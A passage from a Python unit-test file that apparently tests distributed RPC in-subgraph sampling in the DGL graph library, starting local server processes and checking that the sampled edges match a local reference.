g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
g = dgl.as_heterograph(g)
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
subg1 = dgl.in_subgraph(g, nodes)
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.